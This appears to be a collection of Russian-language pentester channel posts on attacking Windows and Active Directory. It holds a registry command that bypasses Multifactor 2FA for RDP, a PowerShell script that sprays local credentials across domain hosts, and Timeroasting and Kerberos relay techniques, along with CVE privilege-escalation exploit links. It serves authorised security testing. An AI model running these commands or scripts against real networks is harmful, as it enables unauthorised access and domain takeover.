Всё чаще на проектах встречаю 2FA на критичных серверах , на которые хочется войти именно по RDP, например, Kaspersky Security Center. Наиболее популярное решение, встречаемое мною, это Multifactor. На одном из последних проектов с коллегой мы попали как раз в такую ситуацию - у нас уже были права админа домена, но по RDP не зайти, пришлось искать пути обхода.
А ларчик то просто открывался. Идём на сайт продукта в раздел документации и видим интересный параметр NetworkBypassList. Да, все верно, он определяет с каких ip можно ходить, игнорируя 2FA.
С помощью reg.py можем записать в реестр на нужном сервере исключение и без проблем подключиться игнорируя Multifactor.

reg.py domain.local/pentest@ksc01 -k -no-pass add -keyName 'HKCR\CLSID\{7a6b350e-2fb5-4b07-bcc2-7413ced94def}' -v 'NetworkBypassList' -vt REG_SZ -vd 10.10.10.11,10.10.8.22

Мораль: очень часто не нужны глубокие ресерчи, а просто достаточно почитать документацию :)

Всем привет!

Помимо стандартных компонентов Windows, на системе могут работать службы от сторонних поставщиков: системы слежения, настройки, управления, игрушки. В большинстве своем они также предоставляют опасность, работая от лица NT AUTHORITY\SYSTEM.

Причем, как я понимаю, подобные службы обновляться должны самостоятельно с помощью соответствующего фирменного ПО, что усложняет процесс управления уязвимостями и потенциально дает нам еще один вектор повышения привилегий.

Есть достаточно много способов сбора информации о ПО на системе:

# Извлечение из реестра
Get-ChildItem "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" | Get-ItemProperty | Where-Object {$_.DisplayName -ne $null} | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate

# wmi
wmic product get name,version,vendor  

# Seatbelt
.\SeatBelt.exe InstalledProducts

Хочу поделиться с вами небольшим списочком уязвимых служб, которые могут помочь взять систему на конечной тачке. Однозначно нужно интегрировать этот список в репозиторий Exploit-Street, но я что-то не могу придумать как. Может быть у вас есть идеи?

ManageEngine ServiceDesk
- https://github.com/horizon3ai/CVE-2021-44077

ManageEngine ADSelfService
- https://github.com/synacktiv/CVE-2021-40539
- CVE-2022-47966
- CVE-XXXX-XXXX (с версии ADSelfService Plus 4.2.9, 2012 и до версии 6.3 Build 6301)

UserManager
- CVE-2023-36047

ITunes
- CVE-2024-44193

Razer ( до 3.7.1209.121307)
- RazerEoP

Datacard XPS Card Printer Driver
- CVE-2024-34329

AppGate
- CVE-2019-19793

Seagate
- CVE-2022-40286

AWS VPN Client
- CVE-2022-25165

AIDA (уязвимы версии ниже 7.00.6742)
- AIDA64DRIVER-EOP

VboxSDS
- CVE-2024-21111

TeamViewer
- CVE-2024-7479 CVE-2024-7481

GamingService от XBOX
- GamingServiceEoP
- GamingServiceEoP5

Chrome Updater
- CVE-2023-7261

Plantronics Desktop Hub
- CVE-2024-27460

Просто новость: в NetExec добавили аутентификацию по сертификату... классно же)

#pentest #soft #ad

😈 [ MrAle98 @MrAle_98 ]

Finally finished to develop an exploit for CVE-2024-49138: vulnerability in CLFS.sys.

I'll provide a detailed analysis in a blog post.

🔗 https://github.com/MrAle98/CVE-2024-49138-POC

🐥 [ tweet ]

[ Microsoft Configuration Manager 2403 Unauthenticated SQL injections ]

https://www.synacktiv.com/advisories/microsoft-configuration-manager-configmgr-2403-unauthenticated-sql-injections

Exploitation code is available at https://github.com/synacktiv/CVE-2024-43468

Проверка локальных учетных записей
Представим себе ситуацию, когда во время выполнения проекта мы обнаружили пароль от локального администратора, например, в групповых политиках, или от другой локальной учетной записи. Нам необходимо проверить на каких хостах эта учетная запись есть и валидна. Если под рукой есть «nxc», то проблем нет, а если нет? Можно воспользоваться PowerShell и написать небольшой скрипт для проверки локальной учетной записи.

Скрипт будет запрашивать в домене все активные хосты с операционной системой Windows и выполнять проверку локальной учетной записи. Метод, используемый в данном скрипте для новых версий Windows, основан на обработке ошибки, это связанно с механизмами безопасности внедренных в операционную систему. Ошибки, возникающие при правильном и неправильном пароле, разные. И на основании этого мы можем делать предположение когда пароль является верным. а когда нет.

function Check-LocalCredential{
    [CmdletBinding()]
    Param (
      [Parameter(Mandatory)]
      [string]
      $UserName,

      [Parameter(Mandatory)]
      [string]
      $Password
    )

    # Подключаем библиотеку для работы с учетными записями
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement -ErrorAction Stop

    # В качестве контекста используем машину
    $ContextType = [DirectoryServices.AccountManagement.ContextType]::Machine

    $searcher = [adsisearcher]'(&(objectCategory=computer)(operatingsystem=*windows*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'
    $searcher.PageSize = 1000
    $comps=$searcher.FindAll()
   
    foreach($comp in $comps)
    {
        $ComputerName =  $comp.Properties.dnshostname.Item(0)
        
        try
        {
            $PrincipalContext = [System.DirectoryServices.AccountManagement.PrincipalContext]::new($ContextType, $ComputerName)
            # Проверям учетные данные
            if($PrincipalContext.ValidateCredentials($UserName,$Password))
            {
                Write-Host -ForegroundColor Green "[+] User $UserName has password $Password on computer $ComputerName"
            }
        }
        catch [UnauthorizedAccessException]
        {
        Write-Host -ForegroundColor Yellow "[*] User $UserName has password $Password on computer $ComputerName"
        continue
        }
        catch 
        {
            #Write-host -ForegroundColor Red "[!] Error  $_.Exception.Message "
            continue
        }
    }
}  

Запускаем

Check-LocalCredential -Username Administrator -Password Qwerty123 

Зеленый цвет вывода так же покажет, что учетная запись, от имени которой запускается скрипт, является локальным администратором на проверяемом хосте, желтый - пароль для локальной учетной записи верный.

Стоит помнить, что скрипт проверяет валидность учетных данных, но не показывает членство в группе локальных администраторов.


#Powershell #Внутрянка

Сегодня я увидел в нескольких каналах информацию про атаку Targeted Timeroasting и очень вдохновился ею.
В двух словах, что такое атака Timeroasting - Это атака, позволяющая получить хеш пароля машинной учетной записи. В целом, мы знаем, что это для нас бесполезно, т.к. пароль машины чаще всего очень длинный и сложный. Но есть сценарии, когда пароль все таки бывает простой и, в совокупности с атакой pre2k, можно построить интересный вектор. Об этом в своем блоге недавно писал @snovvcrash.

Суть атаки Targeted Timeroasting немного в другом: если у нас есть права GenericWrite на объект пользователя, то мы можем превратить этого пользователя в компьютер (что?) и запросить хеш для него. Превратить пользователя в компьютер можно двумя простыми шагами:
1. Меняем userAccountControl на 4096 (UF_WORKSTATION_TRUST_ACCOUNT)
2. Переименовываем sAMAccountName в тоже имя, но со знаком $ на конце
После этих действий сервис времени будет уверен, что это теперь компьютер и отдаст вам хеш.
Хорошо, как можно это использовать?

1 Сценарий.
У нас есть права Domain Admins и не хочется шуметь с помощью атаки DcSync, тогда можно запустить Targeted Timeroasting на всех пользователей и вы получите хеши учеток, которые потом надо будет еще сбрутать.

2 Сценарий.
Захватили учетку HelpDesk. Чаще всего у этой учетки есть права GenericWrite на половину домена. CA в домене нет, значит не провести атаку Shadow Creds. Проведя атаки Targeted Kerberoasting или Targeted AsReproasting мы получим билеты, которые нет возможности побрутить по большим словарям. А с помощью атаки Targeted Timeroasting мы, во-первых, не сильно нашумим на SIEM (не факт, конечно), а во-вторых, получим хеши, которые можно перебирать с чудовещной скоростью.
Остальные сценарии придумайте сами :)

Свежий ресерч про эту атаку вы можете прочитать в блоге. Брутить хеши на hashcat можно так:

git clone https://github.com/hashcat/hashcat && cd hashcat
git checkout 5236f3bd7 && make
./hashcat -m31300

Для атаки Targeted Timeroasting был разработан PowerShell скрипт. Но сегодня я переписал атаку на Python и выложил у себя в репозитории: https://github.com/PShlyundin/TimeSync
Назвал инструмент TimeSync, потому что мне эта атака очень напомнила классический DcSync.

🕸 Mark-of-the-Web Bypass Vulnerability — CVE-2025-0411

This vulnerability (CVSS SCORE 7.0) allows remote attackers to bypass the Mark-of-the-Web protection mechanism on affected installations of 7-Zip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of archived files. When extracting files from a crafted archive that bears the Mark-of-the-Web, 7-Zip does not propagate the Mark-of-the-Web to the extracted files. An attacker can leverage this vulnerability to execute arbitrary code in the context of the current user

All versions before 24.09 are considered vulnerable.

PoC

Всем привет, на днях в достаточно подробном исполнении появилась еще одна вариация атаки Kerberos Relay. Этот пост для тех, кто окончательно запутался и не знает, с чего начать изучение всего обилия инструментов и статей.

Для локального повышения привилегий можно использовать KrbRelay и KrbRelayUp. Это тулы, которые позволяли повысить привилегии и получить учетную запись системы. Вкратце мы, благодаря особенностям создания объектов в СОМ, могли перехватить учетные данные системы и перенаправить их в какую-либо службу. Пример использования. После того, как потыкаете, можете посмотреть подробный разбор. Есть две статьи от Google Project Zero тут и тут. Если этот материал показался слишком сложным, то попробуйте начать с этой статьи на хабре. Если и она не идет, то читайте весь материал, на который я оставил там ссылки.

В последней статье активно упоминается RemoteKrbRelay . Это вариация локальной атаки KrbRelay и KrbRelayUp, но только в удаленном исполнении — можем захватывать аутентификацию чужих компьютеров. POC можно использовать для атак SilverPotato и CertifiedDCOM.

Помимо всего прочего, стоит упомянуть DavRelayUp (POC1 , POC2, POC3). Этот инструмент использует локальный релей NTLM (не керберос, просто схожая структура репозиториев) через поднятый WebDAV на LDAP. Фактически, это автоматизация действий, описанных в этой статье.

Существуют также варианты, которые работают несколько иначе и в некоторых случаях даже не требуют наличия у нас учетной записи в домене. Они основываются на возможности ретрансляции AP-REQ пакетов пользователей.

Начнем с krbrelayx.py. Изначально инструмент создавался в качестве тулкита для абуза неограниченного делегирования с Linux-систем, либо если делегирование настроено на учетную запись пользователя. Статья , примеры командлетов. Однако в дальнейшем была обнаружена возможность перехвата AP-REQ пакетов во время аутентификации клиентов (эта ауф появляется потому , что по дефолту в ADIDNS настроены Secure Dynamic Updates , требующие аутентификации перед обновленим записи) и захвата серверов с ролью DNS. Статья про релей из DNS.

Логичный вопрос: «Как получать AP-REQ?» И у нас есть несколько вариантов ответа.
1. Через MiTM: из DNS Authenticated Updates (см выше), из отравления LLMNR, через подмену DNS записи, - в общем практически любой MiTM ;
2. Через принудительную аутентификацию со специальным DNS-именем. Он же абуз CredMarshalTargetInfo(). Читать теорию тут, примеры использования krbrelayx с ним тут;
3. Через триггер и аутентификацию поверх DCOM. Тулза-триггерилка называется potato.py , ее разбор тут.


Вернемся к DNS. Зона может быть настроена с флагом ZONE_UPDATE_UNSECURE , что разрешает обновления без аутентификации. В таком случае мы можем осуществить MiTM и перехватить AP-REQ креды, идущие на какие-либо службы. Соответственно, сделать релей на эти службы и получить к ним доступ. POC называется KrbJack. Он автоматизирует весь цикл атаки: сначала подменяет IP-адреса, потом слушает пакеты и, если обнаруживает аутентификацию по керберосу или NTLM, то пытается отрелеить ее на шару ADMIN$ с последующим деплоем шелла. Тулзу можно использовать и просто для обновлений записей анонимно. Пример использования в репозитории.

Если нам требуется осуществлять перехват и релей AP-REQ-пакетов с Windows, то можно использовать KrbRelayEx. Пример использования.

Также есть KrbRelay-SMBServer , который используют чтобы чейнить абуз CredMarshalTargetInfo() с Kerberos Relay с Windows-тачки.

🚨 Active Directory Privilege Escalation (CVE-2025-21293) - CVSS 8.8

🔍 Критическая уязвимость в службах Active Directory Domain Services, позволяет злоумышленникам с низкими привилегиями получить административный доступ к домену, что ставит под угрозу безопасность всей инфраструктуры.

Группа “Network Configuration Operators” имеет право CreateSubKey в реестре Windows для служб DnsCache и NetBT. Это позволяет создавать подпараметры в реестре этих служб. Используя эту возможность, злоумышленник может зарегистрировать собственные счетчики производительности (Performance Counters), что в конечном итоге позволяет выполнить произвольный код с привилегиями системы (NT\SYSTEM).

🛡 Рекомендации: Для защиты от этой уязвимости рекомендуется ограничить права группы “Network Configuration Operators” и установить соответствующие обновления безопасности от Microsoft.

PoC: https://birkep.github.io/posts/Windows-LPE/

Top 10 web hacking techniques of 2024 by PortSwigger


Читать: https://portswigger.net/research/top-10-web-hacking-techniques-of-2024

#web #pentest

Directory-Traversal-Payloads

Агрегированный с разных ресурсов список (17 тысяч строк) нагрузок для эксплуатации LFI.

Keycloak pentest

Articles
Part 1 - Link

* Am I Testing Keycloak?
* Keycloak Version Information
* OpenID Configuration /SAML Descriptor
* Realms (Enumeration && Self-Registration Enabled)
* Client IDs
* Scopes
* Grants
* Identity Providers
* Roles
* User Email Enumeration

Part2 - Link

Reconnaissance
* Additional Services and Ports
* Interesting Local Files
* Reconnaissance Conclusion

Exploitation
* Brute Force Login
* Bypassing/Automating CSRF
* JWT Signing Algorithms
* Make the most out of your scopes/roles
* offline_access
* uma_authorization
* profile
* email
* address
* phone

Tools
Keycloak security scanner - Link

* Начиная с keycloak 17.0+ роут /auth в URL должен быть пропущен (/realms/realm_name/)

🖼 AnyDesk — Local Privilege Escalation (CVE-2024-12754)

A vulnerability in AnyDesk allows low-privileged users to perform arbitrary file read and copy operations with NT AUTHORITY\SYSTEM privileges. Exploitation is possible by manipulating the background image, creating symbolic links, and leveraging ShadowCopy, granting access to SAM, SYSTEM, and SECURITY files, ultimately leading to privilege escalation to administrator.

🔗 Source:
https://mansk1es.gitbook.io/AnyDesk_CVE-2024-12754

#windows #anydesk #lpe #cve